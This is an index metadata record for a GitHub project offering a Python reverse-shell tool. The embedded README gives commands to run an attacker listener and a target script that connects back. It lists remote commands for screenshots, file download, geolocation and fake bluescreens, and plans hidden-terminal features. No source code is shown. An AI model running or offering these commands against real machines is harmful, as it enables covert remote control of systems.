{"id":15748007,"url":"https://github.com/jcs090218/reverse_shell","last_synced_at":"2026-02-28T08:07:27.552Z","repository":{"id":97568367,"uuid":"166850131","full_name":"jcs090218/reverse_shell","owner":"jcs090218","description":"Reverse shell implementation using Python","archived":false,"fork":false,"pushed_at":"2021-01-05T18:26:20.000Z","size":1072,"stargazers_count":5,"open_issues_count":0,"forks_count":1,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-02-23T11:18:50.370Z","etag":null,"topics":["exploit","microservice","reverse-shell","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jcs090218.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-01-21T17:04:08.000Z","updated_at":"2024-01-15T18:51:23.000Z","dependencies_parsed_at":"2023-04-25T15:03:34.745Z","dependency_job_id":null,"html_url":"https://github.com/jcs090218/reverse_shell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/jcs090218/reverse_shell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jcs090218%2Freverse_shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jcs090218%2Freverse_shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jcs090218%2Freverse_shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jcs090218%2Freverse_shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jcs090218","download_url":"https://codeload.github.com/jcs090218/reverse_shell/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jcs090218%2Freverse_shell/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29928033,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-27T19:37:42.220Z","status":"online","status_checked_at":"2026-02-28T02:00:07.010Z","response_time":90,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit","microservice","reverse-shell","vulnerability"],"created_at":"2024-10-04T05:40:20.459Z","updated_at":"2026-02-28T08:07:27.527Z","avatar_url":"https://github.com/jcs090218.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"[![Python Ver.](https://img.shields.io/badge/python-%3E=_3.6-green.svg)](https://www.python.org/downloads/)\n[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)\n\n# Reverse Shell\n\nReverse shell implementation using Python.\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"./screenshot/reverse_shell_01.gif\" with=\"600\" height=\"339\"\u003e\n\u003c/p\u003e\n\n## Installation\n\n**NOTE**: Python 3.6 or higher is required.\n\n```bash\n# clone the repo\n$ git clone https://github.com/jcs090218/reverse_shell\n\n# change the working directory to reverse shell\n$ cd reverse_shell\n\n# install python3 and python3-pip if not exist\n\n# install the requirements\n$ pip3 install -r requirements.txt\n```\n\n## Usage\n\n### 1. Listen for target\n\nOn attacker machine, run the `attacker.py` script.\n\n```\npython3 attacker.py [port]\n```\n\n### 2. Execute reverse shell\n\nOn target machine, run the `target.py` script.\n```\npython3 target.py [host] [port]\n```\n\n## Commands\n\n```sh\n# Halt\n!dc            Disconnect the target from this host, target will start reconnection process.\n!shutdown      Shutdown both `attacher` and `target`.\n\n# Listen\n!screenshot    Screenshot the target machine.\n\n# Cheat\n!bluescreen    Fake bluescreen. (Windows Only)\n!dl            Download file by URL onto the target machine.\n\n# Information\n!wan_ip        Get the WAN IP.\n!lan_ip        Get the LAN IP.\n!geo_info      Get the geolocation on the target device.\n```\n\n## Features\n\n### Implemented\n\n* Auto reconnection\n* Downloader (Download file to target machine)\n* Screenshot\n* Full control on the target machine.\n\n### Not Implemented\n\n* Packet encoder/decoder.\n\n## TODOs\n* Bluescreen (Fake)\n* Hidden IP\n* Hidden terminal\n* Multi-target listening\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjcs090218%2Freverse_shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjcs090218%2Freverse_shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjcs090218%2Freverse_shell/lists"}